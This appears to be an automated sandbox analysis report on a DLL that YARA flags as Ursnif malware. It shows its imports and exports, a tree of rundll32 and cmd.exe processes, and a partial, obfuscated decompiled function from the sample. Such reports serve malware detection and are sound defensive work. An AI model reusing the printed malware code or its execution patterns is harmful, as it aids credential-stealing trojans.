FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, GetCurrentThread, GetACP, GetStdHandle, GetFileType, CloseHandle, WaitForSingleObject, GetExitCodeProcess, CreateProcessA, CreateProcessW, GetFileAttributesExW, WriteFile, GetConsoleCP, GetConsoleMode, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, ReadFile, SetFilePointerEx, HeapReAlloc, SetConsoleCtrlHandler, CreateThread
USER32.dll	SetFocus, GetCursorPos, RegisterClassExA, GetFocus, GetClassInfoExA, GetKeyNameTextA, GetWindowTextLengthA, CallWindowProcA, IsDlgButtonChecked, DestroyIcon, AppendMenuA, DrawIconEx, DrawEdge
GDI32.dll	BitBlt, DeleteDC, CreatePen, DeleteObject, CreateDCA, GetObjectA, DPtoLP
ole32.dll	OleUninitialize, OleSetContainedObject, OleInitialize
SHLWAPI.dll	PathFindFileNameA, PathAddBackslashW, PathStripToRootA
DCIMAN32.dll	DCICreatePrimary, DCIOpenProvider, GetDCRegionData, DCISetDestination, DCICloseProvider, DCICreateOverlay, GetWindowRegionData, DCIEndAccess, WinWatchDidStatusChange, DCICreateOffscreen, DCISetSrcDestClip, DCIDestroy, DCIDraw, DCISetClipList, DCIEnum, DCIBeginAccess, WinWatchClose

Exports

Name	Ordinal	Address
Connectdark	1	0x1021c64
Mindlake	2	0x1020de0
Porthigh	3	0x1021c2c
Problemscale	4	0x1021bf8
WingGrass	5	0x1021b0a

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5300 Parent PID: 5728

General

Start time:	15:12:41
Start date:	10/06/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\WoyEsA8v7H.dll'
Imagebase:	0xb80000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5284 Parent PID: 5300

General

Start time:	15:12:42
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\WoyEsA8v7H.dll',#1
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4872 Parent PID: 5300

General

Start time:	15:12:42
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,Connectdark
Imagebase:	0x1270000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4968 Parent PID: 5284

General

Start time:	15:12:42
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\WoyEsA8v7H.dll',#1
Imagebase:	0x1270000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5640 Parent PID: 4872

General

Start time:	15:12:42
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5688 Parent PID: 4968

General

Start time:	15:12:43
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6104 Parent PID: 5640

General

Start time:	15:12:43
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5812 Parent PID: 5688

General

Start time:	15:12:43
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2996 Parent PID: 4872

General

Start time:	15:12:44
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5212 Parent PID: 4968

General

Start time:	15:12:44
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4576 Parent PID: 2996

General

Start time:	15:12:44
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 1492 Parent PID: 5212

General

Start time:	15:12:45
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 4228 Parent PID: 5300

General

Start time:	15:12:45
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,Mindlake
Imagebase:	0x1270000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000000D.00000002.552879000.000000006E1A1000.00000020.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cmd.exe PID: 5656 Parent PID: 4228

General

Start time:	15:12:46
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5436 Parent PID: 5656

General

Start time:	15:12:48
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 4012 Parent PID: 5300

General

Start time:	15:12:50
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,Porthigh
Imagebase:	0x1270000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000010.00000002.545510346.000000006E1A1000.00000020.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cmd.exe PID: 4660 Parent PID: 4228

General

Start time:	15:12:51
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 2540 Parent PID: 4012

General

Start time:	15:12:52
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6036 Parent PID: 2540

General

Start time:	15:12:53
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 1000 Parent PID: 4660

General

Start time:	15:12:53
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7d0870000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 1968 Parent PID: 5300

General

Start time:	15:12:55
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,Problemscale
Imagebase:	0x1270000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000015.00000002.590312640.000000006E1A1000.00000020.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 1532 Parent PID: 5300

General

Start time:	15:13:00
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\WoyEsA8v7H.dll,WingGrass
Imagebase:	0x1270000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cmd.exe PID: 6028 Parent PID: 1968

General

Start time:	15:13:00
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 5424 Parent PID: 4012

General

Start time:	15:13:01
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5440 Parent PID: 6028

General

Start time:	15:13:03
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 1000 Parent PID: 5424

General

Start time:	15:13:03
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 5668 Parent PID: 1532

General

Start time:	15:13:03
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6108 Parent PID: 5668

General

Start time:	15:13:04
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 2168 Parent PID: 5300

General

Start time:	15:13:05
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6180 Parent PID: 1968

General

Start time:	15:13:10
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6192 Parent PID: 1532

General

Start time:	15:13:11
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6200 Parent PID: 5300

General

Start time:	15:13:11
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6208 Parent PID: 6180

General

Start time:	15:13:12
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6292 Parent PID: 6192

General

Start time:	15:13:16
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 5300 Parent PID: 5728 loaddll32.exeCOMMON

Executed Functions

Function 6E1C1285, Relevance: 39.1, APIs: 3, Strings: 19, Instructions: 597
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1C1285(void* __ebx, void* __edi, void* __esi) {
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t133;
				void* _t135;
				int _t139;
				signed int _t142;
				signed int _t146;
				void* _t149;
				signed int _t151;
				signed int _t153;
				void* _t155;
				signed int _t156;
				void* _t164;
				signed int _t168;
				void* _t169;
				signed int _t171;
				void* _t174;
				signed int _t176;
				signed int _t178;
				signed int _t180;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				signed int _t190;
				signed int _t191;
				signed short* _t193;
				signed int _t195;
				void* _t197;
				signed int _t201;
				signed int _t202;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t216;
				signed int _t222;
				void* _t229;
				signed int _t242;
				signed int _t245;
				signed int _t256;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t268;
				void* _t270;
				signed int _t272;
				signed int _t277;
				void* _t281;
				signed int _t282;
				signed int _t286;
				signed int* _t287;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				void* _t301;
				intOrPtr* _t303;
				signed int _t305;
				signed int _t306;
				signed int _t315;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t324;
				signed int _t327;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				signed int _t336;
				signed int _t340;
				signed int _t342;
				signed short _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t354;
				signed int _t358;
				signed short* _t360;
				signed int _t362;
				signed int _t364;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t375;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t386;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				void* _t400;
				void* _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t405;
				void* _t411;
				intOrPtr _t412;
				void* _t417;
				void* _t418;
				void* _t419;
				void* _t422;
				intOrPtr _t423;
				intOrPtr _t426;
				void* _t427;
				void* _t428;
				void* _t434;
				intOrPtr _t435;
				void* _t446;
				void* _t450;
				signed int _t451;
				void* _t452;
				void* _t453;
				void* _t456;

				_t260 = __ebx;
				E6E1E00AC(0x6e227e6f, __ebx, __edi, __esi, 0x2c);
				_t324 =  *0x6e285a90; // 0xbec8bf83
				_t127 =  *0x6e2859d0; // 0x7b3393e
				_t261 =  *0x6e2859d8; // 0x677030d4
				_t380 =  *0x6e2859dc; // 0x5
				_t358 =  *0x6e285a00; // 0xa2212dd7
				_t405 = 0 - _t380;
				_t327 =  *0x6e285a90; // 0xbec8bf83
				 *(_t400 - 0x18) = _t127 + _t324 + 0x31f;
				_t129 = _t261;
				 *(_t400 - 0x2c) = _t129;
				 *(_t400 - 0x1c) = _t380;
				if(_t405 >= 0 && (_t405 > 0 || _t358 >= _t129)) {
					_push(0);
					_t358 = _t358 - _t129 * 0x3d + 0xfffffd1c;
					 *0x6e285a58 =  *0x6e285a58 + 0xfffffd1c;
					 *0x6e285a00 = _t358;
					asm("adc dword [0x6e285a5c], 0xffffffff");
					_t380 = 0;
					asm("sbb esi, [ebp-0x1c]");
					_t261 = _t358 -  *(_t400 - 0x2c) + 0x2e4;
					 *0x6e2859d8 = _t261;
					asm("adc esi, eax");
					 *0x6e2859dc = 0;
				}
				 *(_t400 - 0x28) =  *0x6e2859e6 & 0x0000ffff;
				_t131 = 0x6e2859e6;
				 *(_t400 - 0x2c) = 0x6e2859e6;
				 *(_t400 - 0x1c) = 0x6e2859e6;
				do {
					if(_t358 ==  *(_t400 - 0x28)) {
						goto L8;
					} else {
						asm("cdq");
						_t133 = E6E1E01E0( *_t131 & 0x0000ffff, _t327, _t261, _t380);
						_t380 = _t327;
						_t261 = _t133;
						_t327 = _t358 + 5 + _t261;
						 *0x6e2859d8 = _t261;
						 *0x6e2859dc = _t380;
						 *0x6e285a90 = _t327;
						if(_t327 != ( *0x6e2859f0 & 0x0000ffff)) {
							_t131 =  *(_t400 - 0x1c);
							goto L8;
						}
					}
					break;
					L8:
					_t131 = _t131 + 2;
					 *(_t400 - 0x1c) = _t131;
				} while (_t131 < 0x6e285a44);
				_t135 = 6;
				_t411 =  *0x6e285a98 - _t135; // 0x6e22e664
				if(_t411 != 0) {
					L12:
					_t262 = _t261 - 0x27 +  *(_t400 - 0x18) * 0x3d;
					__eflags = _t262;
					 *0x6e2859d8 = _t262;
					_t263 =  *(_t400 - 0x18);
					asm("sbb esi, edi");
					 *0x6e2859dc = _t380;
				} else {
					_t412 =  *0x6e285a9c; // 0x0
					if(_t412 != 0) {
						goto L12;
					} else {
						_t263 = _t261 + 0x11e05;
					}
				}
				 *0x6e2859d0 = _t263 - _t327 * 0x3d - 0x2e4;
				_t139 = GetSystemDirectoryA("C:\Windows\system32", 0x56d);
				_t381 =  *0x6e285a00; // 0xa2212dd7
				_t266 = _t139;
				_t329 = 0;
				_t360 = 0x6e2859e6;
				 *0x6e285a90 = _t139 -  *0x6e285a90 +  *0x6e2859d0;
				_t142 =  *0x6e2859e6 & 0x0000ffff;
				 *0x6e2859d8 = _t139;
				 *(_t400 - 0x1c) = 0;
				 *0x6e2859dc = 0;
				do {
					if(_t381 == _t142) {
						goto L17;
					} else {
						asm("cdq");
						_t266 = E6E1E01E0( *_t360 & 0x0000ffff, _t329, _t266,  *(_t400 - 0x1c));
						_t256 = _t329;
						 *0x6e2859d8 = _t266;
						 *(_t400 - 0x1c) = _t256;
						_t381 = _t381 + 5 + _t266;
						 *0x6e2859dc = _t256;
						 *0x6e285a90 = _t381;
						if(_t381 != ( *0x6e2859f0 & 0x0000ffff)) {
							_t381 =  *0x6e285a00; // 0xa2212dd7
							_t142 =  *0x6e2859e6 & 0x0000ffff;
							goto L17;
						}
					}
					break;
					L17:
					_t360 =  &(_t360[1]);
				} while (_t360 < 0x6e285a44);
				 *0x6e2859d0 = E6E1C0D32();
				GetTempPathA(0x56d, "C:\Users\hardz\AppData\Local\Temp\");
				_t417 =  *0x6e285a04 - 0x1b47; // 0x0
				if(_t417 == 0) {
					_t318 =  *0x6e285a90; // 0xbec8bf83
					_t319 = _t318 + ( *0x6e2859e6 & 0x0000ffff);
					 *0x6e285a90 = _t319;
					_push(0);
					_t320 =  *0x6e2859d8; // 0x677030d4
					asm("adc [0x6e2859dc], eax");
					 *0x6e2859d8 = _t320 + 0x3b + _t319 * 2;
				}
				_t146 = E6E1C0D32();
				_t402 = _t401 - 0x10;
				 *0x6e2859d0 = _t146;
				_t268 = _t402;
				 *(_t400 - 0x34) = _t402;
				_t330 = "6265";
				 *_t268 = 0;
				 *((intOrPtr*)(_t268 + 8)) = 0;
				 *((intOrPtr*)(_t268 + 0xc)) = 0;
				E6E1C5DAB(_t268, "6265");
				_push("Had s");
				 *(_t400 - 4) = 0;
				_t149 = E6E1C4197(_t260, "6265", 0, _t381);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E1C1E10(_t149);
				_t270 = 6;
				_t418 =  *0x6e285a02 - _t270; // 0xa221
				if(_t418 == 0) {
					_t151 =  *0x6e2859d8; // 0x677030d4
					_t153 = _t151 + 0x11dde +  *0x6e2859d0;
					__eflags = _t153;
					 *0x6e285a90 = _t153;
				} else {
					_t315 =  *0x6e2859d8; // 0x677030d4
					 *0x6e2859d0 =  *0x6e2859d0 +  ~_t315 -  *0x6e285a90 * 0x3d;
				}
				_push("cd Island"); // executed
				E6E20179F(_t260, _t330, 0, _t381);
				_t382 =  *0x6e2859d0; // 0x7b3393e
				_t155 = 6;
				_t25 = _t382 - 0x338; // 0x7b33606
				_t272 = _t25;
				 *0x6e285a90 = _t272;
				_t419 =  *0x6e285a02 - _t155; // 0xa221
				if(_t419 == 0) {
					_t331 =  *0x6e285a00; // 0xa2212dd7
					_t156 = 0;
					 *0x6e2859dc = 0;
					_t333 = _t331 + 0x11dde + _t272;
					__eflags = _t333;
					 *0x6e2859d8 = _t333;
				} else {
					_t333 =  *0x6e2859d8; // 0x677030d4
					_t156 =  *0x6e2859dc; // 0x5
					 *0x6e285a90 = _t272 - _t333 * 0x3d -  *0x6e285a00;
				}
				_push(_t156);
				_push(_t333);
				_push(_t382);
				E6E1C4401(_t260, E6E1C4401(_t260, E6E1C1FF2(_t260, E6E1C20D9(_t260, E6E1C4267(_t260, 0, _t382, _t419), _t333, 0, _t382), _t333, 0, _t382), 0x6e288150, 0, _t382, _t419), "part ", 0, _t382, _t419);
				_t336 =  *0x6e285a00; // 0xa2212dd7
				_t277 = 0x6e285a0e;
				_t362 =  *0x6e2859dc; // 0x5
				_t383 =  *0x6e2859d8; // 0x677030d4
				do {
					if(_t336 != ( *0x6e2859e2 & 0x0000ffff)) {
						 *_t277 =  *_t277 + _t336;
						_t26 = _t336 + 5; // 0xa2212ddc
						_t245 = _t26 + _t383;
						 *0x6e285a90 = _t245;
						_t383 = _t383 + _t245 + 0x3b + _t336;
						_push(0);
						asm("adc edi, eax");
					}
					_t277 = _t277 - 4;
				} while (_t277 > 0x6e2859e2);
				_push("cd Matter m");
				 *0x6e2859d8 = _t383;
				 *0x6e2859dc = _t362; // executed
				E6E20179F(_t260, _t336, _t362, _t383); // executed
				_t164 = 6;
				_t422 =  *0x6e285a98 - _t164; // 0x6e22e664
				if(_t422 != 0) {
					L34:
					 *0x6e2859d8 =  *0x6e2859d8 - 0x27 +  *0x6e2859d0 * 0x3d;
					asm("sbb [0x6e2859dc], ecx");
				} else {
					_t423 =  *0x6e285a9c; // 0x0
					if(_t423 != 0) {
						goto L34;
					} else {
						_t242 =  *0x6e2859d8; // 0x677030d4
						 *0x6e2859d0 = _t242 + 0x11e05;
					}
				}
				_t403 = _t402 - 0x10;
				 *(_t400 - 0x34) = _t403;
				 *0x6e285a90 =  *0x6e285a90 * 0x29266b;
				_t168 = _t403;
				 *_t168 = 5;
				 *((intOrPtr*)(_t168 + 8)) = 0x5c7;
				 *((intOrPtr*)(_t168 + 0xc)) = 0;
				_push("Molecul");
				 *(_t400 - 4) = 1;
				_t169 = E6E1C4197(_t260, _t336, _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E1C1E10(_t169);
				_t281 = 0x27;
				_t171 = E6E1C0EF6(_t281);
				_t404 = _t403 - 0x10;
				 *0x6e2859d8 = _t171;
				_t282 = _t404;
				 *(_t400 - 0x34) = _t404;
				 *0x6e2859dc = 0;
				 *_t282 = 0;
